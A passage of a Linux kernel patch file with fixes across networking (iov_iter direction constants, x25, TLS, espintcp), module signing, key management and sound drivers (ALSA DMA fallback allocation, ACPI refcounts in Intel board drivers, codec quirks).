++	iov_iter_discard(&msg->msg_iter, ITER_DEST, count);
+ 	return sock_recvmsg(sock, msg, flags);
+ }
+ 
+diff --git a/net/tipc/topsrv.c b/net/tipc/topsrv.c
+index e3b427a703980..69c88cc03887d 100644
+--- a/net/tipc/topsrv.c
++++ b/net/tipc/topsrv.c
+@@ -396,7 +396,7 @@ static int tipc_conn_rcv_from_sock(struct tipc_conn *con)
+ 	iov.iov_base = &s;
+ 	iov.iov_len = sizeof(s);
+ 	msg.msg_name = NULL;
+-	iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, iov.iov_len);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, iov.iov_len);
+ 	ret = sock_recvmsg(con->sock, &msg, MSG_DONTWAIT);
+ 	if (ret == -EWOULDBLOCK)
+ 		return -EWOULDBLOCK;
+diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
+index a03d66046ca32..6c593788dc250 100644
+--- a/net/tls/tls_device.c
++++ b/net/tls/tls_device.c
+@@ -620,7 +620,7 @@ int tls_device_sendpage(struct sock *sk, struct page *page,
+ 	kaddr = kmap(page);
+ 	iov.iov_base = kaddr + offset;
+ 	iov.iov_len = size;
+-	iov_iter_kvec(&msg_iter, WRITE, &iov, 1, size);
++	iov_iter_kvec(&msg_iter, ITER_SOURCE, &iov, 1, size);
+ 	iter_offset.msg_iter = &msg_iter;
+ 	rc = tls_push_data(sk, iter_offset, size, flags, TLS_RECORD_TYPE_DATA,
+ 			   NULL);
+@@ -697,7 +697,7 @@ static int tls_device_push_pending_record(struct sock *sk, int flags)
+ 	union tls_iter_offset iter;
+ 	struct iov_iter msg_iter;
+ 
+-	iov_iter_kvec(&msg_iter, WRITE, NULL, 0, 0);
++	iov_iter_kvec(&msg_iter, ITER_SOURCE, NULL, 0, 0);
+ 	iter.msg_iter = &msg_iter;
+ 	return tls_push_data(sk, iter, 0, flags, TLS_RECORD_TYPE_DATA, NULL);
+ }
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 9ed9786341259..a83d2b4275fa6 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -2427,7 +2427,7 @@ static bool tls_is_tx_ready(struct tls_sw_context_tx *ctx)
+ {
+ 	struct tls_rec *rec;
+ 
+-	rec = list_first_entry(&ctx->tx_list, struct tls_rec, list);
++	rec = list_first_entry_or_null(&ctx->tx_list, struct tls_rec, list);
+ 	if (!rec)
+ 		return false;
+ 
+diff --git a/net/x25/af_x25.c b/net/x25/af_x25.c
+index 3b55502b29657..5c7ad301d742e 100644
+--- a/net/x25/af_x25.c
++++ b/net/x25/af_x25.c
+@@ -482,6 +482,12 @@ static int x25_listen(struct socket *sock, int backlog)
+ 	int rc = -EOPNOTSUPP;
+ 
+ 	lock_sock(sk);
++	if (sock->state != SS_UNCONNECTED) {
++		rc = -EINVAL;
++		release_sock(sk);
++		return rc;
++	}
++
+ 	if (sk->sk_state != TCP_LISTEN) {
+ 		memset(&x25_sk(sk)->dest_addr, 0, X25_ADDR_LEN);
+ 		sk->sk_max_ack_backlog = backlog;
+diff --git a/net/xfrm/espintcp.c b/net/xfrm/espintcp.c
+index 29a540dcb5a71..d6fece1ed982d 100644
+--- a/net/xfrm/espintcp.c
++++ b/net/xfrm/espintcp.c
+@@ -354,7 +354,7 @@ static int espintcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 	*((__be16 *)buf) = cpu_to_be16(msglen);
+ 	pfx_iov.iov_base = buf;
+ 	pfx_iov.iov_len = sizeof(buf);
+-	iov_iter_kvec(&pfx_iter, WRITE, &pfx_iov, 1, pfx_iov.iov_len);
++	iov_iter_kvec(&pfx_iter, ITER_SOURCE, &pfx_iov, 1, pfx_iov.iov_len);
+ 
+ 	err = sk_msg_memcopy_from_iter(sk, &pfx_iter, &emsg->skmsg,
+ 				       pfx_iov.iov_len);
+diff --git a/scripts/Makefile.modinst b/scripts/Makefile.modinst
+index a4c987c23750f..10df89b9ef679 100644
+--- a/scripts/Makefile.modinst
++++ b/scripts/Makefile.modinst
+@@ -66,9 +66,13 @@ endif
+ # Don't stop modules_install even if we can't sign external modules.
+ #
+ ifeq ($(CONFIG_MODULE_SIG_ALL),y)
++ifeq ($(filter pkcs11:%, $(CONFIG_MODULE_SIG_KEY)),)
+ sig-key := $(if $(wildcard $(CONFIG_MODULE_SIG_KEY)),,$(srctree)/)$(CONFIG_MODULE_SIG_KEY)
++else
++sig-key := $(CONFIG_MODULE_SIG_KEY)
++endif
+ quiet_cmd_sign = SIGN    $@
+-      cmd_sign = scripts/sign-file $(CONFIG_MODULE_SIG_HASH) $(sig-key) certs/signing_key.x509 $@ \
++      cmd_sign = scripts/sign-file $(CONFIG_MODULE_SIG_HASH) "$(sig-key)" certs/signing_key.x509 $@ \
+                  $(if $(KBUILD_EXTMOD),|| true)
+ else
+ quiet_cmd_sign :=
+diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c
+index 96a92a645216d..d54f73c558f72 100644
+--- a/security/keys/keyctl.c
++++ b/security/keys/keyctl.c
+@@ -1251,7 +1251,7 @@ long keyctl_instantiate_key(key_serial_t id,
+ 		struct iov_iter from;
+ 		int ret;
+ 
+-		ret = import_single_range(WRITE, (void __user *)_payload, plen,
++		ret = import_single_range(ITER_SOURCE, (void __user *)_payload, plen,
+ 					  &iov, &from);
+ 		if (unlikely(ret))
+ 			return ret;
+@@ -1283,7 +1283,7 @@ long keyctl_instantiate_key_iov(key_serial_t id,
+ 	if (!_payload_iov)
+ 		ioc = 0;
+ 
+-	ret = import_iovec(WRITE, _payload_iov, ioc,
++	ret = import_iovec(ITER_SOURCE, _payload_iov, ioc,
+ 				    ARRAY_SIZE(iovstack), &iov, &from);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/sound/core/memalloc.c b/sound/core/memalloc.c
+index 7268304009ada..11ff1ee51345c 100644
+--- a/sound/core/memalloc.c
++++ b/sound/core/memalloc.c
+@@ -542,16 +542,15 @@ static void *snd_dma_noncontig_alloc(struct snd_dma_buffer *dmab, size_t size)
+ 	struct sg_table *sgt;
+ 	void *p;
+ 
++#ifdef CONFIG_SND_DMA_SGBUF
++	if (cpu_feature_enabled(X86_FEATURE_XENPV))
++		return snd_dma_sg_fallback_alloc(dmab, size);
++#endif
+ 	sgt = dma_alloc_noncontiguous(dmab->dev.dev, size, dmab->dev.dir,
+ 				      DEFAULT_GFP, 0);
+ #ifdef CONFIG_SND_DMA_SGBUF
+-	if (!sgt && !get_dma_ops(dmab->dev.dev)) {
+-		if (dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG)
+-			dmab->dev.type = SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK;
+-		else
+-			dmab->dev.type = SNDRV_DMA_TYPE_DEV_SG_FALLBACK;
++	if (!sgt && !get_dma_ops(dmab->dev.dev))
+ 		return snd_dma_sg_fallback_alloc(dmab, size);
+-	}
+ #endif
+ 	if (!sgt)
+ 		return NULL;
+@@ -718,19 +717,38 @@ static const struct snd_malloc_ops snd_dma_sg_wc_ops = {
+ 
+ /* Fallback SG-buffer allocations for x86 */
+ struct snd_dma_sg_fallback {
++	bool use_dma_alloc_coherent;
+ 	size_t count;
+ 	struct page **pages;
++	/* DMA address array; the first page contains #pages in ~PAGE_MASK */
++	dma_addr_t *addrs;
+ };
+ 
+ static void __snd_dma_sg_fallback_free(struct snd_dma_buffer *dmab,
+ 				       struct snd_dma_sg_fallback *sgbuf)
+ {
+-	bool wc = dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK;
+-	size_t i;
+-
+-	for (i = 0; i < sgbuf->count && sgbuf->pages[i]; i++)
+-		do_free_pages(page_address(sgbuf->pages[i]), PAGE_SIZE, wc);
++	size_t i, size;
++
++	if (sgbuf->pages && sgbuf->addrs) {
++		i = 0;
++		while (i < sgbuf->count) {
++			if (!sgbuf->pages[i] || !sgbuf->addrs[i])
++				break;
++			size = sgbuf->addrs[i] & ~PAGE_MASK;
++			if (WARN_ON(!size))
++				break;
++			if (sgbuf->use_dma_alloc_coherent)
++				dma_free_coherent(dmab->dev.dev, size << PAGE_SHIFT,
++						  page_address(sgbuf->pages[i]),
++						  sgbuf->addrs[i] & PAGE_MASK);
++			else
++				do_free_pages(page_address(sgbuf->pages[i]),
++					      size << PAGE_SHIFT, false);
++			i += size;
++		}
++	}
+ 	kvfree(sgbuf->pages);
++	kvfree(sgbuf->addrs);
+ 	kfree(sgbuf);
+ }
+ 
+@@ -739,24 +757,36 @@ static void *snd_dma_sg_fallback_alloc(struct snd_dma_buffer *dmab, size_t size)
+ 	struct snd_dma_sg_fallback *sgbuf;
+ 	struct page **pagep, *curp;
+ 	size_t chunk, npages;
++	dma_addr_t *addrp;
+ 	dma_addr_t addr;
+ 	void *p;
+-	bool wc = dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK;
++
++	/* correct the type */
++	if (dmab->dev.type == SNDRV_DMA_TYPE_DEV_SG)
++		dmab->dev.type = SNDRV_DMA_TYPE_DEV_SG_FALLBACK;
++	else if (dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG)
++		dmab->dev.type = SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK;
+ 
+ 	sgbuf = kzalloc(sizeof(*sgbuf), GFP_KERNEL);
+ 	if (!sgbuf)
+ 		return NULL;
++	sgbuf->use_dma_alloc_coherent = cpu_feature_enabled(X86_FEATURE_XENPV);
+ 	size = PAGE_ALIGN(size);
+ 	sgbuf->count = size >> PAGE_SHIFT;
+ 	sgbuf->pages = kvcalloc(sgbuf->count, sizeof(*sgbuf->pages), GFP_KERNEL);
+-	if (!sgbuf->pages)
++	sgbuf->addrs = kvcalloc(sgbuf->count, sizeof(*sgbuf->addrs), GFP_KERNEL);
++	if (!sgbuf->pages || !sgbuf->addrs)
+ 		goto error;
+ 
+ 	pagep = sgbuf->pages;
+-	chunk = size;
++	addrp = sgbuf->addrs;
++	chunk = (PAGE_SIZE - 1) << PAGE_SHIFT; /* to fit in low bits in addrs */
+ 	while (size > 0) {
+ 		chunk = min(size, chunk);
+-		p = do_alloc_pages(dmab->dev.dev, chunk, &addr, wc);
++		if (sgbuf->use_dma_alloc_coherent)
++			p = dma_alloc_coherent(dmab->dev.dev, chunk, &addr, DEFAULT_GFP);
++		else
++			p = do_alloc_pages(dmab->dev.dev, chunk, &addr, false);
+ 		if (!p) {
+ 			if (chunk <= PAGE_SIZE)
+ 				goto error;
+@@ -768,17 +798,25 @@ static void *snd_dma_sg_fallback_alloc(struct snd_dma_buffer *dmab, size_t size)
+ 		size -= chunk;
+ 		/* fill pages */
+ 		npages = chunk >> PAGE_SHIFT;
++		*addrp = npages; /* store in lower bits */
+ 		curp = virt_to_page(p);
+-		while (npages--)
++		while (npages--) {
+ 			*pagep++ = curp++;
++			*addrp++ |= addr;
++			addr += PAGE_SIZE;
++		}
+ 	}
+ 
+ 	p = vmap(sgbuf->pages, sgbuf->count, VM_MAP, PAGE_KERNEL);
+ 	if (!p)
+ 		goto error;
++
++	if (dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK)
++		set_pages_array_wc(sgbuf->pages, sgbuf->count);
++
+ 	dmab->private_data = sgbuf;
+ 	/* store the first page address for convenience */
+-	dmab->addr = snd_sgbuf_get_addr(dmab, 0);
++	dmab->addr = sgbuf->addrs[0] & PAGE_MASK;
+ 	return p;
+ 
+  error:
+@@ -788,10 +826,23 @@ static void *snd_dma_sg_fallback_alloc(struct snd_dma_buffer *dmab, size_t size)
+ 
+ static void snd_dma_sg_fallback_free(struct snd_dma_buffer *dmab)
+ {
++	struct snd_dma_sg_fallback *sgbuf = dmab->private_data;
++
++	if (dmab->dev.type == SNDRV_DMA_TYPE_DEV_WC_SG_FALLBACK)
++		set_pages_array_wb(sgbuf->pages, sgbuf->count);
+ 	vunmap(dmab->area);
+ 	__snd_dma_sg_fallback_free(dmab, dmab->private_data);
+ }
+ 
++static dma_addr_t snd_dma_sg_fallback_get_addr(struct snd_dma_buffer *dmab,
++					       size_t offset)
++{
++	struct snd_dma_sg_fallback *sgbuf = dmab->private_data;
++	size_t index = offset >> PAGE_SHIFT;
++
++	return (sgbuf->addrs[index] & PAGE_MASK) | (offset & ~PAGE_MASK);
++}
++
+ static int snd_dma_sg_fallback_mmap(struct snd_dma_buffer *dmab,
+ 				    struct vm_area_struct *area)
+ {
+@@ -806,8 +857,8 @@ static const struct snd_malloc_ops snd_dma_sg_fallback_ops = {
+ 	.alloc = snd_dma_sg_fallback_alloc,
+ 	.free = snd_dma_sg_fallback_free,
+ 	.mmap = snd_dma_sg_fallback_mmap,
++	.get_addr = snd_dma_sg_fallback_get_addr,
+ 	/* reuse vmalloc helpers */
+-	.get_addr = snd_dma_vmalloc_get_addr,
+ 	.get_page = snd_dma_vmalloc_get_page,
+ 	.get_chunk_size = snd_dma_vmalloc_get_chunk_size,
+ };
+diff --git a/sound/firewire/motu/motu-hwdep.c b/sound/firewire/motu/motu-hwdep.c
+index a900fc0e76440..88d1f4b56e4be 100644
+--- a/sound/firewire/motu/motu-hwdep.c
++++ b/sound/firewire/motu/motu-hwdep.c
+@@ -87,6 +87,10 @@ static long hwdep_read(struct snd_hwdep *hwdep, char __user *buf, long count,
+ 			return -EFAULT;
+ 
+ 		count = consumed;
++	} else {
++		spin_unlock_irq(&motu->lock);
++
++		count = 0;
+ 	}
+ 
+ 	return count;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 6fab7c8fc19ae..db9518de9343c 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9202,6 +9202,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1025, 0x142b, "Acer Swift SF314-42", ALC255_FIXUP_ACER_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1025, 0x1430, "Acer TravelMate B311R-31", ALC256_FIXUP_ACER_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1025, 0x1466, "Acer Aspire A515-56", ALC255_FIXUP_ACER_HEADPHONE_AND_MIC),
++	SND_PCI_QUIRK(0x1025, 0x1534, "Acer Predator PH315-54", ALC255_FIXUP_ACER_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x0470, "Dell M101z", ALC269_FIXUP_DELL_M101Z),
+ 	SND_PCI_QUIRK(0x1028, 0x053c, "Dell Latitude E5430", ALC292_FIXUP_DELL_E7X),
+ 	SND_PCI_QUIRK(0x1028, 0x054b, "Dell XPS one 2710", ALC275_FIXUP_DELL_XPS),
+@@ -9432,6 +9433,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+diff --git a/sound/pci/hda/patch_via.c b/sound/pci/hda/patch_via.c
+index aea7fae2ca4b2..2994f85bc1b9a 100644
+--- a/sound/pci/hda/patch_via.c
++++ b/sound/pci/hda/patch_via.c
+@@ -819,6 +819,9 @@ static int add_secret_dac_path(struct hda_codec *codec)
+ 		return 0;
+ 	nums = snd_hda_get_connections(codec, spec->gen.mixer_nid, conn,
+ 				       ARRAY_SIZE(conn) - 1);
++	if (nums < 0)
++		return nums;
++
+ 	for (i = 0; i < nums; i++) {
+ 		if (get_wcaps_type(get_wcaps(codec, conn[i])) == AC_WID_AUD_OUT)
+ 			return 0;
+diff --git a/sound/soc/amd/acp-es8336.c b/sound/soc/amd/acp-es8336.c
+index 2fe8df86053ae..89499542c803f 100644
+--- a/sound/soc/amd/acp-es8336.c
++++ b/sound/soc/amd/acp-es8336.c
+@@ -198,9 +198,11 @@ static int st_es8336_late_probe(struct snd_soc_card *card)
+ 	int ret;
+ 
+ 	adev = acpi_dev_get_first_match_dev("ESSX8336", NULL, -1);
+-	if (adev)
+-		put_device(&adev->dev);
++	if (!adev)
++		return -ENODEV;
++
+ 	codec_dev = acpi_get_first_physical_node(adev);
++	acpi_dev_put(adev);
+ 	if (!codec_dev)
+ 		dev_err(card->dev, "can not find codec dev\n");
+ 
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index 0ddb6362fcc52..2533d0973529f 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -1359,8 +1359,8 @@ static struct snd_soc_dai_driver wsa883x_dais[] = {
+ 			.stream_name = "SPKR Playback",
+ 			.rates = WSA883X_RATES | WSA883X_FRAC_RATES,
+ 			.formats = WSA883X_FORMATS,
+-			.rate_max = 8000,
+-			.rate_min = 352800,
++			.rate_min = 8000,
++			.rate_max = 352800,
+ 			.channels_min = 1,
+ 			.channels_max = 1,
+ 		},
+diff --git a/sound/soc/intel/avs/core.c b/sound/soc/intel/avs/core.c
+index 4f93639ce4887..5bb3eee2f7838 100644
+--- a/sound/soc/intel/avs/core.c
++++ b/sound/soc/intel/avs/core.c
+@@ -476,6 +476,29 @@ err_remap_bar0:
+ 	return ret;
+ }
+ 
++static void avs_pci_shutdown(struct pci_dev *pci)
++{
++	struct hdac_bus *bus = pci_get_drvdata(pci);
++	struct avs_dev *adev = hdac_to_avs(bus);
++
++	cancel_work_sync(&adev->probe_work);
++	avs_ipc_block(adev->ipc);
++
++	snd_hdac_stop_streams(bus);
++	avs_dsp_op(adev, int_control, false);
++	snd_hdac_ext_bus_ppcap_int_enable(bus, false);
++	snd_hdac_ext_bus_link_power_down_all(bus);
++
++	snd_hdac_bus_stop_chip(bus);
++	snd_hdac_display_power(bus, HDA_CODEC_IDX_CONTROLLER, false);
++
++	if (avs_platattr_test(adev, CLDMA))
++		pci_free_irq(pci, 0, &code_loader);
++	pci_free_irq(pci, 0, adev);
++	pci_free_irq(pci, 0, bus);
++	pci_free_irq_vectors(pci);
++}
++
+ static void avs_pci_remove(struct pci_dev *pci)
+ {
+ 	struct hdac_device *hdev, *save;
+@@ -679,6 +702,7 @@ static struct pci_driver avs_pci_driver = {
+ 	.id_table = avs_ids,
+ 	.probe = avs_pci_probe,
+ 	.remove = avs_pci_remove,
++	.shutdown = avs_pci_shutdown,
+ 	.driver = {
+ 		.pm = &avs_dev_pm,
+ 	},
+diff --git a/sound/soc/intel/boards/bytcht_es8316.c b/sound/soc/intel/boards/bytcht_es8316.c
+index a935c5fd9edbc..4dd37848b30e3 100644
+--- a/sound/soc/intel/boards/bytcht_es8316.c
++++ b/sound/soc/intel/boards/bytcht_es8316.c
+@@ -497,21 +497,28 @@ static int snd_byt_cht_es8316_mc_probe(struct platform_device *pdev)
+ 	if (adev) {
+ 		snprintf(codec_name, sizeof(codec_name),
+ 			 "i2c-%s", acpi_dev_name(adev));
+-		put_device(&adev->dev);
+ 		byt_cht_es8316_dais[dai_index].codecs->name = codec_name;
+ 	} else {
+ 		dev_err(dev, "Error cannot find '%s' dev\n", mach->id);
+ 		return -ENXIO;
+ 	}
+ 
++	codec_dev = acpi_get_first_physical_node(adev);
++	acpi_dev_put(adev);
++	if (!codec_dev)
++		return -EPROBE_DEFER;
++	priv->codec_dev = get_device(codec_dev);
++
+ 	/* override platform name, if required */
+ 	byt_cht_es8316_card.dev = dev;
+ 	platform_name = mach->mach_params.platform;
+ 
+ 	ret = snd_soc_fixup_dai_links_platform_name(&byt_cht_es8316_card,
+ 						    platform_name);
+-	if (ret)
++	if (ret) {
++		put_device(codec_dev);
+ 		return ret;
++	}
+ 
+ 	/* Check for BYTCR or other platform and setup quirks */
+ 	dmi_id = dmi_first_match(byt_cht_es8316_quirk_table);
+@@ -539,13 +546,10 @@ static int snd_byt_cht_es8316_mc_probe(struct platform_device *pdev)
+ 
+ 	/* get the clock */
+ 	priv->mclk = devm_clk_get(dev, "pmc_plt_clk_3");
+-	if (IS_ERR(priv->mclk))
++	if (IS_ERR(priv->mclk)) {
++		put_device(codec_dev);
+ 		return dev_err_probe(dev, PTR_ERR(priv->mclk), "clk_get pmc_plt_clk_3 failed\n");
+-
+-	codec_dev = acpi_get_first_physical_node(adev);
+-	if (!codec_dev)
+-		return -EPROBE_DEFER;
+-	priv->codec_dev = get_device(codec_dev);
++	}
+ 
+ 	if (quirk & BYT_CHT_ES8316_JD_INVERTED)
+ 		props[cnt++] = PROPERTY_ENTRY_BOOL("everest,jack-detect-inverted");
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index ddd2625bed90d..4f46f52c38e44 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -1626,13 +1626,18 @@ static int snd_byt_rt5640_mc_probe(struct platform_device *pdev)
+ 	if (adev) {
+ 		snprintf(byt_rt5640_codec_name, sizeof(byt_rt5640_codec_name),
+ 			 "i2c-%s", acpi_dev_name(adev));
+-		put_device(&adev->dev);
+ 		byt_rt5640_dais[dai_index].codecs->name = byt_rt5640_codec_name;
+ 	} else {
+ 		dev_err(dev, "Error cannot find '%s' dev\n", mach->id);
+ 		return -ENXIO;
+ 	}
+ 
++	codec_dev = acpi_get_first_physical_node(adev);
++	acpi_dev_put(adev);
++	if (!codec_dev)
++		return -EPROBE_DEFER;
++	priv->codec_dev = get_device(codec_dev);
++
+ 	/*
+ 	 * swap SSP0 if bytcr is detected
+ 	 * (will be overridden if DMI quirk is detected)
+@@ -1707,11 +1712,6 @@ static int snd_byt_rt5640_mc_probe(struct platform_device *pdev)
+ 		byt_rt5640_quirk = quirk_override;
+ 	}
+ 
+-	codec_dev = acpi_get_first_physical_node(adev);
+-	if (!codec_dev)
+-		return -EPROBE_DEFER;
+-	priv->codec_dev = get_device(codec_dev);
+-
+ 	if (byt_rt5640_quirk & BYT_RT5640_JD_HP_ELITEP_1000G2) {
+ 		acpi_dev_add_driver_gpios(ACPI_COMPANION(priv->codec_dev),
+ 					  byt_rt5640_hp_elitepad_1000g2_gpios);
+diff --git a/sound/soc/intel/boards/bytcr_rt5651.c b/sound/soc/intel/boards/bytcr_rt5651.c
+index 2beb686768f24..d74d184e1c7f3 100644
+--- a/sound/soc/intel/boards/bytcr_rt5651.c
++++ b/sound/soc/intel/boards/bytcr_rt5651.c
+@@ -922,7 +922,6 @@ static int snd_byt_rt5651_mc_probe(struct platform_device *pdev)
+ 	if (adev) {
+ 		snprintf(byt_rt5651_codec_name, sizeof(byt_rt5651_codec_name),
+ 			 "i2c-%s", acpi_dev_name(adev));
+-		put_device(&adev->dev);
+ 		byt_rt5651_dais[dai_index].codecs->name = byt_rt5651_codec_name;
+ 	} else {
+ 		dev_err(dev, "Error cannot find '%s' dev\n", mach->id);
+@@ -930,6 +929,7 @@ static int snd_byt_rt5651_mc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	codec_dev = acpi_get_first_physical_node(adev);
++	acpi_dev_put(adev);
+ 	if (!codec_dev)
+ 		return -EPROBE_DEFER;
+ 	priv->codec_dev = get_device(codec_dev);
+diff --git a/sound/soc/intel/boards/bytcr_wm5102.c b/sound/soc/intel/boards/bytcr_wm5102.c
+index 45a6805787f56..f8da1bcd010ed 100644
+--- a/sound/soc/intel/boards/bytcr_wm5102.c
++++ b/sound/soc/intel/boards/bytcr_wm5102.c
+@@ -411,9 +411,9 @@ static int snd_byt_wm5102_mc_probe(struct platform_device *pdev)
+ 		return -ENOENT;
+ 	}
+ 	snprintf(codec_name, sizeof(codec_name), "spi-%s", acpi_dev_name(adev));
+-	put_device(&adev->dev);
+ 
+ 	codec_dev = bus_find_device_by_name(&spi_bus_type, NULL, codec_name);
++	acpi_dev_put(adev);
+ 	if (!codec_dev)
+ 		return -EPROBE_DEFER;
+ 
+diff --git a/sound/soc/intel/boards/sof_es8336.c b/sound/soc/intel/boards/sof_es8336.c
+index 773e5d1d87d46..894b6610b9e27 100644
+--- a/sound/soc/intel/boards/sof_es8336.c
++++ b/sound/soc/intel/boards/sof_es8336.c
+@@ -681,7 +681,6 @@ static int sof_es8336_probe(struct platform_device *pdev)
+ 	if (adev) {
+ 		snprintf(codec_name, sizeof(codec_name),
+ 			 "i2c-%s", acpi_dev_name(adev));
+-		put_device(&adev->dev);
+ 		dai_links[0].codecs->name = codec_name;
+ 
+ 		/* also fixup codec dai name if relevant */
+@@ -692,16 +691,19 @@ static int sof_es8336_probe(struct platform_device *pdev)
+ 		return -ENXIO;
+ 	}
+ 
+-	ret = snd_soc_fixup_dai_links_platform_name(&sof_es8336_card,
+-						    mach->mach_params.platform);
+-	if (ret)
+-		return ret;
+-
+ 	codec_dev = acpi_get_first_physical_node(adev);
++	acpi_dev_put(adev);
+ 	if (!codec_dev)
+ 		return -EPROBE_DEFER;
+ 	priv->codec_dev = get_device(codec_dev);
+ 
++	ret = snd_soc_fixup_dai_links_platform_name(&sof_es8336_card,
++						    mach->mach_params.platform);
++	if (ret) {
++		put_device(codec_dev);
++		return ret;
++	}
++
+ 	if (quirk & SOF_ES8336_JD_INVERTED)
+ 		props[cnt++] = PROPERTY_ENTRY_BOOL("everest,jack-detect-inverted");
+ 
+diff --git a/sound/soc/sof/ipc4-mtrace.c b/sound/soc/sof/ipc4-mtrace.c
+index 70dea8ae706e9..0ec6ef681012d 100644
+--- a/sound/soc/sof/ipc4-mtrace.c
++++ b/sound/soc/sof/ipc4-mtrace.c
+@@ -344,9 +344,10 @@ static ssize_t sof_ipc4_priority_mask_dfs_write(struct file *file,
+ 						size_t count, loff_t *ppos)
+ {
+ 	struct sof_mtrace_priv *priv = file->private_data;
+-	int id, ret;
++	unsigned int id;
+ 	char *buf;
+ 	u32 mask;
++	int ret;
+ 
+ 	/*
+ 	 * To update Nth mask entry, write:
+@@ -357,9 +358,9 @@ static ssize_t sof_ipc4_priority_mask_dfs_write(struct file *file,
+ 	if (IS_ERR(buf))
+ 		return PTR_ERR(buf);
+ 
+-	ret = sscanf(buf, "%d,0x%x", &id, &mask);
++	ret = sscanf(buf, "%u,0x%x", &id, &mask);
+ 	if (ret != 2) {
+-		ret = sscanf(buf, "%d,%x", &id, &mask);
++		ret = sscanf(buf, "%u,%x", &id, &mask);
+ 		if (ret != 2) {
+ 			ret = -EINVAL;
+ 			goto out;
+diff --git a/sound/soc/sof/sof-audio.c b/sound/soc/sof/sof-audio.c
+index 62092e2d609c7..2df433c6ef55f 100644
+--- a/sound/soc/sof/sof-audio.c
++++ b/sound/soc/sof/sof-audio.c
+@@ -271,9 +271,9 @@ sof_unprepare_widgets_in_path(struct snd_sof_dev *sdev, struct snd_soc_dapm_widg
+ 	struct snd_sof_widget *swidget = widget->dobj.private;
+ 	struct snd_soc_dapm_path *p;
+ 
+-	/* return if the widget is in use or if it is already unprepared */
+-	if (!swidget->prepared || swidget->use_count > 1)
+-		return;
++	/* skip if the widget is in use or if it is already unprepared */
++	if (!swidget || !swidget->prepared || swidget->use_count > 0)
++		goto sink_unprepare;
+ 
+ 	if (widget_ops[widget->id].ipc_unprepare)
+ 		/* unprepare the source widget */
+@@ -281,6 +281,7 @@ sof_unprepare_widgets_in_path(struct snd_sof_dev *sdev, struct snd_soc_dapm_widg
+ 
+ 	swidget->prepared = false;
+ 
++sink_unprepare:
+ 	/* unprepare all widgets in the sink paths */
+ 	snd_soc_dapm_widget_for_each_sink_path(widget, p) {
+ 		if (!p->walking && p->sink->dobj.private) {
+@@ -303,7 +304,7 @@ sof_prepare_widgets_in_path(struct snd_sof_dev *sdev, struct snd_soc_dapm_widget
+ 	struct snd_soc_dapm_path *p;
+ 	int ret;
+ 
+-	if (!widget_ops[widget->id].ipc_prepare || swidget->prepared)
++	if (!swidget || !widget_ops[widget->id].ipc_prepare || swidget->prepared)
+ 		goto sink_prepare;
+ 
+ 	/* prepare the source widget */
+@@ -326,7 +327,8 @@ sink_prepare:
+ 			p->walking = false;
+ 			if (ret < 0) {
+ 				/* unprepare the source widget */
+-				if (widget_ops[widget->id].ipc_unprepare && swidget->prepared) {
++				if (widget_ops[widget->id].ipc_unprepare &&
++				    swidget && swidget->prepared) {
+ 					widget_ops[widget->id].ipc_unprepare(swidget);
+ 					swidget->prepared = false;
+ 				}
+diff --git a/tools/testing/selftests/cgroup/test_cpuset_prs.sh b/tools/testing/selftests/cgroup/test_cpuset_prs.sh
+index 526d2c42d8706..a503244852e4e 100755
+--- a/tools/testing/selftests/cgroup/test_cpuset_prs.sh
++++ b/tools/testing/selftests/cgroup/test_cpuset_prs.sh
+@@ -254,6 +254,7 @@ TEST_MATRIX=(
+ 	# Taking away all CPUs from parent or itself if there are tasks
+ 	# will make the partition invalid.
+ 	"  S+ C2-3:P1:S+  C3:P1  .      .      T     C2-3    .      .     0 A1:2-3,A2:2-3 A1:P1,A2:P-1"
